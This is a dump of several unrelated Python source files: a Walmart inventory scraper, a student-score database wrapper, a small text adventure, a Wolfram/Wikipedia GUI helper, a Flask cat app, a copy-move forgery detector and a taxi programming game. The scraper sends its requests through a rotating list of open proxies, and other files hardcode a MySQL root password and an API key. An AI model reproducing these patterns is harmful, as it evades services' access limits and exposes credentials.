{'http': '37.232.247.87:80', 'https': '37.232.247.87:80'}, {'http': '121.58.200.158:80', 'https': '121.58.200.158:80'}, {'http': '149.202.195.236:443', 'https': '149.202.195.236:443'}, {'http': '128.199.74.233:3128', 'https': '128.199.74.233:3128'}, {'http': '46.101.40.241:8118', 'https': '46.101.40.241:8118'}, {'http': '219.76.4.72:88', 'https': '219.76.4.72:88'}, {'http': '203.74.4.0:80', 'https': '203.74.4.0:80'}, {'http': '203.74.4.1:80', 'https': '203.74.4.1:80'}, {'http': '193.70.3.144:80', 'https': '193.70.3.144:80'}, {'http': '197.249.51.253:80', 'https': '197.249.51.253:80'}, {'http': '216.139.71.163:8118', 'https': '216.139.71.163:8118'}, {'http': '139.59.125.77:80', 'https': '139.59.125.77:80'}, 
{'http': '203.74.4.4:80', 'https': '203.74.4.4:80'}, {'http': '190.211.80.154:80', 'https': '190.211.80.154:80'}]
ListOfStores = []
directory = strftime('%d%b%Y', gmtime())
if not os.path.exists(directory):
os.makedirs(directory)
def GrabFromSpreadsheet(spreadsheet):
    """Append to the global ListOfStores every store ID (column 0) whose
    second CSV column mentions 'Walmart Supercenter'."""
    with open(spreadsheet, 'r') as handle:
        rows = list(csv.reader(handle))
    matches = [row[0] for row in rows if 'Walmart Supercenter' in str(row[1])]
    ListOfStores.extend(matches)
# Load the store list shipped with the project.
GrabFromSpreadsheet("{}/static/Walmarts.csv".format(os.getcwd()))
# raw_input => this script targets Python 2; the answer is ignored, it only pauses.
a = raw_input('\n\n\n\n\nThis Application pulls all Walmart Inventory Information Across {} stores nationwide. Continue? \n\n\n\n\n'.format(len(ListOfStores)))
# Search terms fanned out to one thread each (digits plus wildcard).
lis = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '*']
def GrabStore():
    """Pop one randomly chosen store ID out of the global ListOfStores
    and return it as a string (the list shrinks by one)."""
    picked = random.choice(ListOfStores)
    ListOfStores.remove(picked)
    return str(picked)
def SaveToCSV(store):
    """Write every scraped SKU dict (global `sku`) to <directory>/<store>.csv.

    Column order is taken from the first SKU; rows are pruned to those keys.
    """
    keys = sku[0].keys()
    # Bug fix: the original concatenated `directory + store`, producing e.g.
    # "05Mar20171234.csv" NEXT TO the dated directory instead of inside it.
    path = os.path.join(directory, str(store) + '.csv')
    # 'wb' is correct for csv writers on Python 2 (this script uses raw_input).
    with open(path, 'wb') as output_file:
        dict_writer = csv.DictWriter(output_file, keys)
        dict_writer.writeheader()
        for s in sku:
            # Drop any keys a later SKU has that the header row lacks.
            data = {key: value for key, value in s.items() if key in keys}
            dict_writer.writerow(data)
    print(store)
def Fin(searchterm, store):
    """Scrape every search-result page for `searchterm` at `store`, appending
    deduplicated item dicts to the shared globals `sku` / `ItemsGrabbed`.

    NOTE(review): the dedup check-then-append on ItemsGrabbed is not
    synchronized although several Fin threads run at once — confirm races
    are acceptable here.
    """
    # First request discovers the total result count; one blind retry on any error.
    try:
        payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': 0, "query":searchterm,"idx":1}
        res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
        Quantity = res.json()['result']['totalCount']
    except:
        time.sleep(10)
        payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': 0, "query":searchterm,"idx":1}
        res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
        Quantity = res.json()['result']['totalCount']
    # af counts consecutive already-seen items; a long streak means this term is exhausted.
    af = 0
    for i in range(0, int(Quantity), 49):
        #print('done')
        prevsku = len(sku)
        try:
            payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': i, "query":searchterm,"idx":1}
            res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
            for results in res.json()["result"]['results']:
                e = {}
                # `flatten` is defined elsewhere in this project — presumably flattens
                # the nested result dict; TODO confirm.
                a = flatten(results)
                for key, value in a.items() :
                    # Keep only the last '_'-separated segment of each flattened key.
                    key = str(str(key)[::-1].partition('_')[0])[::-1]
                    e[key] = value
                e['atime'] = str(datetime.now())
                if str(e['upc']) not in ItemsGrabbed:
                    sku.append(e)
                    ItemsGrabbed.append(e['upc'])
                    print(e["WWWItemId"])
                    af = 0
                else:
                    af = af + 1
        except BaseException as exp:
            print(exp)
            pass
        if af > 1000:
            print('broke thread')
            break
# Main driver: for each remaining store, launch one scraper thread per search
# term, wait for all of them, then dump the collected SKUs to CSV.
while len(ListOfStores) > 0:
    try:
        # Per-store shared state mutated by the Fin threads.
        ItemsGrabbed = []
        sku = []
        store = str(GrabStore())
        threads = [threading.Thread(target=Fin, args=(searchterm, store)) for searchterm in lis]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        SaveToCSV(store)
    except BaseException as exp:
        # Best-effort: log and move on to the next store.
        print(exp)
        pass
|
21,524 | 92431b5ab6d7d8840fe4f497e3eb5d090f912924 | import pymysql
import joblib
import pandas as pd
def linear_prediction(time):
    """Predict a score for the given study time using the pickled linear model."""
    model = joblib.load("score.pkl")
    return model.predict(time)
class DataBase:
    """Thin wrapper around the local MySQL `student_score` database."""

    def __init__(self):
        # Dict cursor so fetched rows map column name -> value.
        self.conn = pymysql.connect(user="root", passwd="000000", db="student_score", host='127.0.0.1')
        self.cursor = self.conn.cursor(pymysql.cursors.DictCursor)

    def database_select(self):
        # Fetch every row of the score table as a pandas DataFrame.
        query = "SELECT * FROM student_score.score;"
        self.cursor.execute(query)
        return pd.DataFrame(self.cursor.fetchall())

    def database_insert(self, average, study_time):
        # Parameterized insert of one (average, study time) pair.
        query = """INSERT INTO score(평균, 공부시간) VALUES (%s, %s)"""
        self.cursor.execute(query, (average, study_time))
        return self.conn.commit()
class AverageLinearRegression:
    """Holds one student's five subject scores plus study time and can
    persist the computed average to the database."""

    def __init__(self, korean, english, math, social, science, time):
        self.korean = korean
        self.english = english
        self.math = math
        self.social = social
        self.science = science
        self.time = time

    def get_sum(self):
        """Total of the five subject scores."""
        scores = (self.korean, self.english, self.math, self.social, self.science)
        return sum(scores)

    def data_saving_average(self):
        """Insert (average, study time) into the DB and return the average."""
        average = self.get_sum() / 5
        DataBase().database_insert(average, self.time)
        return average
|
21,525 | 3456493a4b7630118723ccd5917e09e915501dca | """Exercise Game Class."""
from ex35_rooms import Rooms
class Game(object):
    """Drives the ex35 text adventure's opening room."""

    def __init__(self):
        """Create the room collection the game dispatches into."""
        self.r = Rooms()

    def start(self):
        """Show the opening prompt and branch on the player's door choice."""
        print("You are in a dark room.")
        print("THere is a door to your right and left.")
        print("Which one do you take?")
        answer = input("> ")
        if answer == "left":
            self.r.bear_room()
        elif answer == "right":
            # A falsy return from cthulhu_room() means "restart from the top".
            if not self.r.cthulhu_room():
                self.start()
        else:
            self.r.dead("You stumble around the room until you starve.")
|
21,526 | 963dd085935df9513bc45a2d17d023428f90e6f4 | import wolframalpha
import wikipedia
import PySimpleGUI as sg
import random
username = "Miles" # You can change this to display your own name.
# NOTE(review): hardcoded Wolfram Alpha app ID committed to source — should be
# read from an environment variable or config file instead.
client = wolframalpha.Client("Q5W5Y7-UHHJXPLXGA")
def get_greeting():
    """Return a random salutation for the greeting banner."""
    return random.choice(["Hello", "Hey", "Hi", "Greetings", "Salutations"])
def get_exception():
    """Return a random apology used when a lookup fails."""
    return random.choice(["Sorry", "Apologies", "Forgive me"])
sg.theme("Black")
# Window layout: greeting line, a free-text query field, Ask and Exit buttons.
layout = [
    [sg.Text(get_greeting() + ", " + username + "! What can I help you with?")],
    [sg.Input()],
    [sg.Button("Ask")],
    [sg.Button("Exit")]
]
window = sg.Window("DANTE", layout)
def search_wolfram(name, values):
    """Query Wolfram Alpha with the first input field's text.

    Returns the first result's text, or an apology string on any failure
    (network error, no results, etc.).
    """
    try:
        answer = next(client.query(values[0]).results).text
        return answer
    except:
        return f"Nothing found! {get_exception()}, {name}."
def search_wikipedia(name, values):
    """Return a two-sentence Wikipedia summary for the query, or an apology
    string when the lookup fails for any reason."""
    try:
        return wikipedia.summary(values[0], sentences=2)
    except:
        return f"Nothing found! {get_exception()}, {name}."
def run_dante():
    """GUI event loop: answer each query with both backends until Exit/close."""
    while True:
        event, values = window.read()
        # None = window closed via the title bar.
        if event in (None, "Exit"):
            break
        wolfram_result = search_wolfram(username, values)
        wikipedia_result = search_wikipedia(username, values)
        print(wolfram_result, wikipedia_result)
        sg.Popup("Wolfram Alpha Result: " + wolfram_result,
        "Wikipedia Result: " + wikipedia_result)
    window.close()
run_dante()
|
21,527 | cdab2b196991ed87894617c5eaf8714953c67b9e | #!/usr/bin/python
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "strava2mysql.settings")
from strava import models
if __name__ == "__main__":
athlete = models.Athlete()
athlete.firstname = "Fish"
athlete.lastname = "Sticks"
athlete.save()
print athlete
|
21,528 | 64335e1927e18ace1a60abef04b568f60b3df23b | from flask import Flask, flash, redirect, render_template, request, session, abort
import requests, json
app = Flask(__name__)
@app.route("/")
def GetCats():
    """Fetch one random cat image URL from TheCatAPI and render it."""
    response = requests.get("https://api.thecatapi.com/v1/images/search")
    payload = response.json()
    return render_template('cats.html', cat_pic=payload[0]["url"])
if __name__ == "__main__":
    #TODO: Use environment variables for this!
    # NOTE(review): binding to 0.0.0.0 exposes the dev server on all interfaces.
    app.run(host='0.0.0.0', port=5000)
21,529 | f57b7e7813095e8ed4ce9cac7c453044a32fad42 | # Ad-hoc algorithm for copy-move forgery detection in images.
# Implemented by - vasiliauskas.agnius@gmail.com
# Robust match algorithm steps:
# 1. Blur image for eliminating image details
# 2. Convert image to degraded palette
# 3. Decompose image into small NxN pixel blocks
# 4. Alphabetically order these blocks by their pixel values
# 5. Extract only these adjacent blocks which have small absolute color difference
# 6. Cluster these blocks into clusters by intersection area among blocks
# 7. Extract only these clusters which are bigger than block size
# 8. Extract only these clusters which have similar cluster, by using some sort of similarity function (in this case Hausdorff distance between clusters)
# 9. Draw discovered similar clusters on image
import sys
from PIL import Image, ImageFilter, ImageDraw
import operator as op
from optparse import OptionParser
def Dist(p1, p2):
    """
    Euclidean distance between 2 points
    """
    dx = p1[0] - p2[0]
    dy = p1[1] - p2[1]
    return ((dx * dx) + (dy * dy)) ** 0.5
def intersectarea(p1, p2, size):
    """
    Given 2 boxes, this function returns intersection area
    """
    x1, y1 = p1
    x2, y2 = p2
    left, top = max(x1, x2), max(y1, y2)
    right = min(x1 + size, x2 + size)
    bottom = min(y1 + size, y2 + size)
    # Disjoint boxes have no overlap at all.
    if bottom < top or right < left:
        return 0
    return abs(right - left) * abs(bottom - top)
def Hausdorff_distance(clust1, clust2, forward, dir):
    """
    Function measures distance between 2 sets. (Some kind of non-similarity between 2 sets if you like).
    It is modified Hausdorff distance, because instead of max distance - average distance is taken.
    This is done for function being more error-prone to cluster coordinates.
    """
    # forward=None -> symmetric distance: worst of the two one-sided passes.
    if forward is None:
        fwd = Hausdorff_distance(clust1, clust2, True, dir)
        bwd = Hausdorff_distance(clust1, clust2, False, dir)
        return max(fwd, bwd)
    if forward:
        clstart, clend = clust1, clust2
        dx, dy = dir
    else:
        clstart, clend = clust2, clust1
        dx, dy = -dir[0], -dir[1]
    # Average (not max) of nearest-neighbour distances after shifting by (dx, dy).
    total = 0
    for p1 in clstart:
        total += min(Dist((p1[0] + dx, p1[1] + dy), p2) for p2 in clend)
    return total / len(clstart)
def hassimilarcluster(ind, clusters):
    """
    For given cluster tells does it have twin cluster in image or not.
    """
    global opt
    item = op.itemgetter
    # Top-left corner of the candidate cluster's bounding box.
    tx = min(clusters[ind], key=item(0))[0]
    ty = min(clusters[ind], key=item(1))[1]
    for i, cl in enumerate(clusters):
        if i == ind:
            continue
        cx = min(cl, key=item(0))[0]
        cy = min(cl, key=item(1))[1]
        # Translate by the corner offset before comparing shapes.
        offset = (cx - tx, cy - ty)
        if Hausdorff_distance(clusters[ind], cl, None, offset) <= int(opt.rgsim):
            return True
    return False
def blockpoints(pix, coords, size):
    """
    Generator of pixel colors of given block.
    """
    xs, ys = coords
    # Column-major over the block: x outer, y inner (matches downstream ordering).
    for dx in range(size):
        for dy in range(size):
            yield pix[xs + dx, ys + dy]
def colortopalette(color, palette):
    """
    Convert given color into palette color.

    Maps `color` to the upper bound of the half-open interval [a, b) that
    contains it; returns None when no interval matches.
    """
    for lower, upper in palette:
        if lower <= color < upper:
            return upper
def imagetopalette(image, palcolors):
    """
    Convert given image into custom palette colors
    """
    assert image.mode == 'L', "Only grayscale images supported !"
    # Adjacent palette values form the half-open buckets fed to colortopalette.
    intervals = list(zip(palcolors, palcolors[1:]))
    image.putdata([colortopalette(value, intervals) for value in image.getdata()])
def getparts(image, block_len):
    """
    Decompose given image into small blocks of data.

    Each entry is the block's pixel values followed by its (x, y) origin as
    the last element; the list is sorted lexicographically by pixel content,
    which places visually identical blocks next to each other.
    """
    img = image.convert('L') if image.mode != 'L' else image
    w, h = img.size
    parts = []
    # Bluring image for abandoning image details and noise.
    global opt
    for n in range(int(opt.imblev)):
        img = img.filter(ImageFilter.SMOOTH_MORE)
    # Converting image to custom palette
    imagetopalette(img, [x for x in range(256) if x%int(opt.impalred) == 0])
    pix = img.load()
    # One overlapping block per pixel position (minus the right/bottom margin).
    for x in range(w-block_len):
        for y in range(h-block_len):
            data = list(blockpoints(pix, (x,y), block_len)) + [(x,y)]
            parts.append(data)
    parts = sorted(parts)
    return parts
def similarparts(imagparts):
    """
    Return only these blocks which are similar by content.

    Adjacent (already sorted) blocks whose absolute color difference is below
    opt.blsim are kept, but only when the block has enough internal color
    deviation (flat blocks match everything and are noise).
    """
    dupl = []
    global opt
    # Last element of each part is its (x, y) origin, so pixel data is [:l].
    l = len(imagparts[0])-1
    for i in range(len(imagparts)-1):
        difs = sum(abs(x-y) for x,y in zip(imagparts[i][:l],imagparts[i+1][:l]))
        mean = float(sum(imagparts[i][:l])) / l
        dev = float(sum(abs(mean-val) for val in imagparts[i][:l])) / l
        # Bug fix: an all-zero block has mean == 0 and the original `dev/mean`
        # raised ZeroDivisionError; such flat blocks are excluded anyway.
        if mean and dev/mean >= float(opt.blcoldev):
            if difs <= int(opt.blsim):
                if imagparts[i] not in dupl:
                    dupl.append(imagparts[i])
                if imagparts[i+1] not in dupl:
                    dupl.append(imagparts[i+1])
    return dupl
def clusterparts(parts, block_len):
    """
    Further filtering out non essential blocks.
    This is done by clustering blocks at first and after that
    filtering out small clusters and clusters which doesn`t have
    twin cluster in image.
    """
    # Sort by the (x, y) origin stored as each part's last element.
    parts = sorted(parts, key=op.itemgetter(-1))
    global opt
    clusters = [[parts[0][-1]]]
    # assign all parts to clusters
    for i in range(1,len(parts)):
        x, y = parts[i][-1]
        # detect box already in cluster
        fc = []
        for k,cl in enumerate(clusters):
            for xc,yc in cl:
                ar = intersectarea((xc,yc),(x,y),block_len)
                intrat = float(ar)/(block_len*block_len)
                # Enough overlap with any member -> the box belongs to cluster k.
                if intrat > float(opt.blint):
                    if not fc: clusters[k].append((x,y))
                    fc.append(k)
                    break
        # if this is new cluster
        if not fc:
            clusters.append([(x,y)])
        else:
            # re-clustering boxes if in several clusters at once
            while len(fc) > 1:
                clusters[fc[0]] += clusters[fc[-1]]
                del clusters[fc[-1]]
                del fc[-1]
    item = op.itemgetter
    # filter out small clusters (bounding-box diagonal relative to block size)
    clusters = [clust for clust in clusters if Dist((min(clust,key=item(0))[0],min(clust,key=item(1))[1]), (max(clust,key=item(0))[0],max(clust,key=item(1))[1]))/(block_len*1.4) >= float(opt.rgsize)]
    # filter out clusters, which doesn`t have identical twin cluster
    clusters = [clust for x,clust in enumerate(clusters) if hassimilarcluster(x,clusters)]
    return clusters
def marksimilar(image, clust, size):
    """
    Draw discovered similar image regions.

    Tints every clustered block cyan and, in auto mode, outlines each
    cluster's bounding box in magenta. Returns the (mutated) image.
    """
    global opt
    blocks = []
    if clust:
        draw = ImageDraw.Draw(image)
        mask = Image.new('RGB', (size,size), 'cyan')
        for cl in clust:
            for x,y in cl:
                im = image.crop((x,y,x+size,y+size))
                im = Image.blend(im,mask,0.5)
                blocks.append((x,y,im))
        for bl in blocks:
            x,y,im = bl
            image.paste(im,(x,y,x+size,y+size))
        if int(opt.imauto):
            for cl in clust:
                cx1 = min([cx for cx,cy in cl])
                cy1 = min([cy for cx,cy in cl])
                # Bug fix: the original used the global `block_len` here instead
                # of the `size` parameter, silently coupling this function to
                # the __main__ script's variable.
                cx2 = max([cx for cx,cy in cl]) + size
                cy2 = max([cy for cx,cy in cl]) + size
                draw.rectangle([cx1,cy1,cx2,cy2],outline="magenta")
    return image
if __name__ == '__main__':
    # CLI options correspond to the tunable thresholds of the robust-match steps.
    cmd = OptionParser("usage: %prog image_file [options]")
    cmd.add_option('', '--imauto', help='Automatically search identical regions. (default: %default)', default=1)
    cmd.add_option('', '--imblev',help='Blur level for degrading image details. (default: %default)', default=8)
    cmd.add_option('', '--impalred',help='Image palette reduction factor. (default: %default)', default=15)
    cmd.add_option('', '--rgsim', help='Region similarity threshold. (default: %default)', default=5)
    cmd.add_option('', '--rgsize',help='Region size threshold. (default: %default)', default=1.5)
    cmd.add_option('', '--blsim', help='Block similarity threshold. (default: %default)',default=200)
    cmd.add_option('', '--blcoldev', help='Block color deviation threshold. (default: %default)', default=0.2)
    cmd.add_option('', '--blint', help='Block intersection threshold. (default: %default)', default=0.2)
    # `opt` is read as a global by most functions above.
    opt, args = cmd.parse_args()
    if not args:
        cmd.print_help()
        sys.exit()
    print('Analyzing image, please wait... (can take some minutes)')
    block_len = 15
    im = Image.open(args[0])
    # Pipeline: decompose -> pairwise-similar blocks -> clusters -> annotate.
    lparts = getparts(im, block_len)
    dparts = similarparts(lparts)
    cparts = clusterparts(dparts, block_len) if int(opt.imauto) else [[elem[-1] for elem in dparts]]
    im = marksimilar(im, cparts, block_len)
    out = args[0].split('.')[0] + '_analyzed.jpg'
    im.save(out)
    print('Done. Found', len(cparts) if int(opt.imauto) else 0, 'identical regions')
    print('Output is saved in file -', out)
|
21,530 | 809e30652c05a8fd4d53bee355313cf7ae329213 | #-*- coding:utf-8 -*-
import pygame
from pygame.locals import *
import sys
import os
import random
import importlib
# Database initial setup (local MySQL "taxi" schema holds the rankings).
import mysql.connector
conn = mysql.connector.connect(user='root', password='', host='localhost', database='taxi')
cur=conn.cursor()
# Cached top-5 ranking rows (name, score), refreshed by updatesql().
txtrank = []
runrank = []
def updatesql():
    """Refresh the cached top-5 rankings (smallest code size / shortest
    distance) for the currently selected map and problem."""
    # Fixes: parameterized queries replace the injectable string concatenation,
    # and the 'mapsttr' typo in the global declaration is corrected.
    global cur, conn, problemstr, mapstr, txtrank, runrank
    cur.execute("SELECT name, txt FROM ranking WHERE map = %s AND problem = %s ORDER BY txt LIMIT 5",
                (mapstr, problemstr))
    txtrank = cur.fetchall()
    cur.execute("SELECT name, run FROM ranking WHERE map = %s AND problem = %s ORDER BY run LIMIT 5",
                (mapstr, problemstr))
    runrank = cur.fetchall()
# Game state machine states
G_TITLE = 0
G_SELECT_MAP = 1
G_SELECT_PROBLEM = 2
G_GAME = 3
G_TEST = 4
G_NAME = 5
G_RANKING = 6
G_FIRED = 7
mode = 0
# Fixed window size; w/h are also passed into the map setup functions.
w=1280
h=720
SCREEN_SIZE = (w, h)
pygame.init()
# Quit the game (shut down pygame, the DB connection, and the process)
def gameend():
    """Shut down pygame, release the database cursor/connection, and exit."""
    pygame.quit()
    # Bug fix: the original wrote `cur.close` / `conn.close` without
    # parentheses, so the methods were never actually called.
    cur.close()
    conn.close()
    sys.exit()
# Pass FULLSCREEN as the second argument to run fullscreen.
screen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)
pygame.display.set_caption("Taxi")
# Font setup
font50 = pygame.font.Font(None, 50)
font80 = pygame.font.Font(None, 80)
font100 = pygame.font.Font(None, 100)
font160 = pygame.font.Font(None, 160)
# Other imports (driver supplies gaming/testing/setup/get_score/countingStr)
from driver import *
import writer
# Build the list shown by the map-select screen from map/*.py
maplist = os.listdir("map")
mapstr = ""
for i in reversed(range(len(maplist))):
    # Drop __init__/__pycache__ entries; strip ".py" from the rest.
    if maplist[i][:2] == "__":
        del maplist[i]
    else:
        maplist[i] = maplist[i][:-3]
maplist.append("back")
maps = None
mapselector = 0
setupMapfunction = None
# Import the selected map module
def mapset():
    """Import the selected map module and (re)build the map state."""
    # Bug fix: `mapstr` was missing from the global declaration (the list even
    # contains a 'mapsttr' typo elsewhere), so the assignment below only ever
    # set a local and the selected map name never reached updatesql()/mapdelete().
    global mapstr, maplist, mapselector, maps, setupMapfunction, car, the_map, loclist, road, w, h
    maps = importlib.import_module("map." + maplist[mapselector])
    mapstr = maplist[mapselector]
    setupMapfunction = maps.set
    car, the_map, loclist, road = setupMapfunction(w, h)
# Unload the imported map module
def mapdelete():
    """Unload the current map module and reset the map-selection state."""
    global mapstr, maps, mapselector, setupMapfunction
    module_name = "map." + mapstr
    if module_name in sys.modules:
        sys.modules.pop(module_name)
    mapstr = ""
    maps = None
    setupMapfunction = None
    mapselector = 0
# Build the list shown by the problem-select screen from problem/*.py
problemlist = os.listdir("problem")
problemstr = ""
for i in reversed(range(len(problemlist))):
    # Drop __init__/__pycache__ entries; strip ".py" from the rest.
    if problemlist[i][:2] == "__":
        del problemlist[i]
    else:
        problemlist[i] = problemlist[i][:-3]
problemlist.append("back")
problems = None
problemselector = 0
# Import the selected problem module
def problemset():
    """Import the selected problem module and initialise it on the current map."""
    global problemstr, problemlist, problemselector, problems, car, loclist, the_map, road, w, h
    name = problemlist[problemselector]
    problemstr = name
    problems = importlib.import_module("problem." + name)
    problems.set_problem(loclist)
    setup(car, loclist, the_map, road, h, w, False)
# Unload the imported problem module
def problemdelete():
    """Unload the current problem module and reset the selection state.

    Note: problemstr itself is deliberately left untouched here.
    """
    global problemstr, problems, problemselector
    module_name = "problem." + problemstr
    if module_name in sys.modules:
        sys.modules.pop(module_name)
    problemselector = 0
    problems = None
# Images, text-input widget, and frame clock
titlelogo = pygame.image.load("img/logo.png")
fired = pygame.image.load("img/gameover.png")
textinput = writer.TextInput()
clock = pygame.time.Clock()
# Main state-machine loop; `mode` selects which screen is drawn and handled.
# NOTE(review): `font` (used in G_GAME/G_TEST) and countingStr/get_score/
# gaming/testing/setup are presumably provided by `from driver import *` —
# confirm, they are not defined in this file.
while True:
    # Title screen
    if mode == G_TITLE:
        # Draw logo and background
        screen.fill((255, 255, 255))
        screen.blit(titlelogo, [(w - titlelogo.get_width()) / 2.0, (h - titlelogo.get_height()) / 2.0])
        # Draw the "start" label (inverts colors on mouse-over)
        x, y = pygame.mouse.get_pos()
        text = font80.render("start", True, (255, 255, 255))
        if (w - text.get_width()) / 2 - 20 < x < (w + text.get_width()) / 2 + 20 and h * 3 / 4 - 10 < y < h * 3 / 4 + text.get_height() + 10:
            text = font80.render("start", True, (0, 0, 0))
            pygame.draw.rect(screen, (255, 255, 255), Rect((w - text.get_width()) / 2 - 20, h * 3 / 4 - 10, text.get_width() + 40, text.get_height() + 20))
        else:
            pygame.draw.rect(screen, (0, 0, 0), Rect((w - text.get_width()) / 2 - 20, h * 3 / 4 - 10, text.get_width() + 40, text.get_height() + 20))
        screen.blit(text, [(w - text.get_width()) / 2, h * 3 / 4])
        # Event handling
        for event in pygame.event.get():
            if event.type == QUIT:
                gameend()
            # Click handling
            elif event.type == MOUSEBUTTONDOWN and event.button == 1:
                x, y = event.pos
                if (w - text.get_width()) / 2 - 20 < x < (w + text.get_width()) / 2 + 20 and h * 3 / 4 - 10 < y < h * 3 / 4 + text.get_height() + 10:
                    mapdelete()
                    mode = G_SELECT_MAP
            # Key handling
            elif event.type == KEYDOWN:
                if event.key == K_RETURN:
                    mapdelete()
                    mode = G_SELECT_MAP
                elif event.key == K_ESCAPE:
                    gameend()
    # Map-select screen
    elif mode == G_SELECT_MAP:
        # Draw the screen
        screen.fill((255, 255, 255))
        text = font160.render("MAP SELECT", True, (0, 0, 0))
        screen.blit(text, [(w - text.get_width()) / 2, 0])
        x, y = pygame.mouse.get_pos()
        # Each map entry is roughly 160x80; hovering moves the selector.
        for i in range(len(maplist)):
            if w / 2 - 80 < x < w / 2 + 80 and h / 2 - 50 - (len(maplist) / 2 - i) * 100 < y < h / 2 + 30 - (len(maplist) / 2 - i) * 100:
                mapselector = i
                break
        for i in range(len(maplist)):
            if i == mapselector:
                pygame.draw.rect(screen, (0, 0, 0), Rect(w / 2 - 80, h / 2 - 50 - (len(maplist) / 2 - i) * 100, 160, 80))
                text = font80.render(maplist[i], True, (255, 255, 255))
            else:
                pygame.draw.rect(screen, (255, 255, 255), Rect(w / 2 - 80, h / 2 - 50 - (len(maplist) / 2 - i ) * 100, 160, 80))
                text = font80.render(maplist[i], True, (0, 0, 0))
            screen.blit(text, [(w - text.get_width()) / 2, (h - 80) / 2 - (len(maplist) / 2 - i ) * 100])
        # Event handling
        for event in pygame.event.get():
            if event.type == QUIT:
                gameend()
            # Click handling
            elif event.type == MOUSEBUTTONDOWN and event.button == 1:
                x, y = event.pos
                for i in range(len(maplist)):
                    if w / 2 - 80 < x < w / 2 + 80 and h / 2 - 50 - (len(maplist) / 2 - i) * 100 < y < h / 2 + 30 - (len(maplist) / 2 - i) * 100:
                        if maplist[i] == "back":
                            mapselector = 0
                            mode = G_TITLE
                        else:
                            mapset()
                            problemdelete()
                            mode = G_SELECT_PROBLEM
            # Key handling
            elif event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    gameend()
                # Selector movement
                elif event.key == K_DOWN:
                    mapselector = min(mapselector + 1, len(maplist) - 1)
                elif event.key == K_UP:
                    mapselector = max(mapselector - 1, 0)
                elif event.key == K_RETURN:
                    if maplist[mapselector] == "back":
                        mapselector = 0
                        mode = G_TITLE
                    else:
                        mapset()
                        mode = G_SELECT_PROBLEM
    # Problem-select screen
    elif mode == G_SELECT_PROBLEM:
        # Draw the screen
        screen.fill((255, 255, 255))
        text = font160.render("PROBLEM SELECT", True, (0, 0, 0))
        screen.blit(text, [(w - text.get_width()) / 2, 0])
        x, y = pygame.mouse.get_pos()
        # Each problem entry is roughly 320x80.
        for i in range(len(problemlist)):
            if w / 2 - 80 < x < w / 2 + 80 and h / 2 - (len(problemlist) / 2 - i) * 100 < y < h / 2 + 180 - (len(problemlist) / 2 - i) * 100:
                problemselector = i
                break
        for i in range(len(problemlist)):
            if i == problemselector:
                text = font80.render(problemlist[i], True, (255, 255, 255))
                pygame.draw.rect(screen, (0, 0, 0), Rect(w / 2 - 160, h / 2 + 110 - (len(problemlist) / 2 - i) * 100, 320, 80))
            else:
                text = font80.render(problemlist[i], True, (0, 0, 0))
                # NOTE(review): this branch sizes against len(maplist), the
                # selected branch against len(problemlist) — likely a typo; confirm.
                pygame.draw.rect(screen, (255, 255, 255), Rect(w / 2 - 160, h / 2 + 110 - (len(maplist) / 2 - i) * 100, 320, 80))
            screen.blit(text, [(w - text.get_width()) / 2, h / 2 + 110 - (len(problemlist) / 2 - i) * 100])
        # Event handling
        for event in pygame.event.get():
            if event.type == QUIT:
                gameend()
            # Click handling
            elif event.type == MOUSEBUTTONDOWN and event.button == 1:
                x,y = event.pos
                for i in range(len(problemlist)):
                    if w / 2 - 80 < x < w / 2 + 80 and h / 2 - (len(problemlist) / 2 - i) * 100 < y < h / 2 + 180 - (len(problemlist) / 2 - i) * 100:
                        if problemlist[i] == "back":
                            mapdelete()
                            mode = G_SELECT_MAP
                        else:
                            problemset()
                            mode = G_GAME
            # Key handling
            elif event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    gameend()
                # Selector movement
                elif event.key == K_DOWN:
                    problemselector = min(problemselector + 1, len(problemlist) - 1)
                elif event.key == K_UP:
                    problemselector = max(problemselector - 1, 0)
                elif event.key == K_RETURN:
                    if problemlist[problemselector] == "back":
                        mapdelete()
                        mode = G_SELECT_MAP
                    else:
                        problemset()
                        mode = G_GAME
    # In-game (drawing and logic are mostly delegated to driver)
    elif mode == G_GAME:
        screen.fill((255, 255, 255))
        finished, ans = gaming(screen)
        text = font.render("Answer: " + problems.check + ", Your Output: " + ans, True, (0, 0, 0))
        screen.blit(text, [450, h - 80])
        # Check the answer
        if finished:
            if ans == problems.check:
                car, the_map, loclist, road = setupMapfunction(w, h)
                problems.set_test(loclist, 0)
                setup(car, loclist, the_map, road, h, w, True)
                mode = G_TEST
            else:
                mode = G_FIRED
    # Testing (also delegated to driver)
    elif mode == G_TEST:
        screen.fill((255, 255, 255))
        text = font.render("Testing...({0}/{1})".format(problems.testphase, len(problems.check_test)), True, (0,0,0))
        screen.blit(text, [(w-text.get_width())/2,20])
        finished, result = testing(screen)
        text = font.render("Answer: " + problems.check_test[problems.testphase] + ", Your Output: " + result, True, (0, 0, 0))
        screen.blit(text, [450, h - 80])
        if finished:
            # Check the answer; finish once no test cases remain
            if result == problems.check_test[problems.testphase]:
                problems.testphase+=1
                if problems.testphase == len(problems.check_test):
                    mode = G_NAME
                    textinput = writer.TextInput()
                    updatesql()
                else:
                    car, the_map, loclist, road = setupMapfunction(w, h)
                    problems.set_test(loclist, problems.testphase)
                    setup(car, loclist, the_map, road, h, w, True)
            else:
                mode = G_FIRED
    # Clear screen: collects the player's name for the ranking
    elif mode == G_NAME:
        # Frame
        pygame.draw.rect(screen, (255, 255, 200), Rect(30, 10, 1220, 700))
        # Score
        txt,run=get_score()
        text = font100.render("Score: {:d}bytes / {:.3f}miles".format(txt,run), True, (0, 0, 0))
        screen.blit(text, [(w-text.get_width())//2,10])
        # Draw the ranking tables
        text = font80.render("code", True, (0, 0, 0))
        screen.blit(text,[320-text.get_width()/2,150])
